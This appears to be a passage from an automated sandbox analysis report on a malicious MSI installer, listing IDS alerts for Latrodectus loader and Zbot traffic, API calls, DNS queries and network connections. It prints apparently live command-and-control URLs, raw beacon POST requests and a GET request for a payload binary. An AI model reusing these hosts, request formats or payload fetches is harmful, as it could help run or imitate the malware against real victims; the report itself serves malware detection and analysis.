            Source: C:\Windows\System32\msiexec.exeFile opened: c:
            Source: C:\Windows\System32\msiexec.exeFile opened: a:
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB56A0 FindFirstFileExW,4_2_00007FFD92DB56A0
            Source: C:\Windows\explorer.exeCode function: 7_2_02F2A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,7_2_02F2A8E0
            Source: C:\Windows\explorer.exeCode function: 7_2_02F22B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,7_2_02F22B28
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8416F4 FindFirstFileW,FindNextFileW,LoadLibraryW,7_2_0B8416F4
            Source: C:\Windows\explorer.exeCode function: 7_2_0B846604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,7_2_0B846604
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8E50D8 FindFirstFileA,7_2_0B8E50D8

            Networking

            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49959 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49942 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49935 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.6:49978 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.6:49989 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49998 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.6:49965 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50002 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50008 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50006 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50009 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50019 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50017 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50012 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50022 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50018 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50015 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50000 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50020 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50001 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50043 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50046 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50042 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50025 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50032 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50038 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49947 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50048 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50004 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50005 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50024 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49999 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50031 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50041 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50010 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50047 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50029 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50026 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50027 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50035 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50044 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50021 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50023 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50013 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50030 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50036 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50034 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50014 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50016 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50040 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50039 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50045 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50037 -> 172.67.161.60:443
            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.16.1 443
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.46.11 8817
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.40.41 8817
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.161.60 443
            Source: Malware configuration extractorURLs: https://proliforetka.com/test/
            Source: Malware configuration extractorURLs: https://dogirafer.com/test/
            Source: global trafficTCP traffic: 192.168.2.6:49709 -> 94.232.46.11:8817
            Source: global trafficTCP traffic: 192.168.2.6:49843 -> 94.232.40.41:8817
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49942 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49959 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49989 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49947 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49965 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49998 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50004 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50002 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50010 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50015 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50006 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50003 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50022 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50017 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50021 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50009 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50018 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50026 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50030 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50038 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50025 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50032 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50014 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50008 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50027 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50029 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50045 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50044 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50043 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50016 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50020 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50040 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50048 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50023 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50000 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50031 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50013 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50041 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50024 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50042 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50034 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50049 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50035 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50046 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49999 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49935 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50047 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50012 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50005 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50039 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50037 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50019 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50036 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49978 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50001 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49989 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49965 -> 104.21.16.1:443
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX1MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXwMtB7wWZOVXnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcAtkDLcBiGr4ixbRT8User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 360Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXzMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXyMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX9MtB7wWZOVG6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 12248Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX8MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exeCode function: 7_2_02F25078 InternetReadFile,7_2_02F25078
            Source: global trafficDNS traffic detected: DNS query: muuxxu.com
            Source: global trafficDNS traffic detected: DNS query: cronoze.com
            Source: global trafficDNS traffic detected: DNS query: proliforetka.com
            Source: global trafficDNS traffic detected: DNS query: dogirafer.com
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: explorer.exe, 00000007.00000000.2402983007.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: explorer.exe, 00000007.00000000.2402983007.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: explorer.exe, 00000007.00000000.2402983007.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
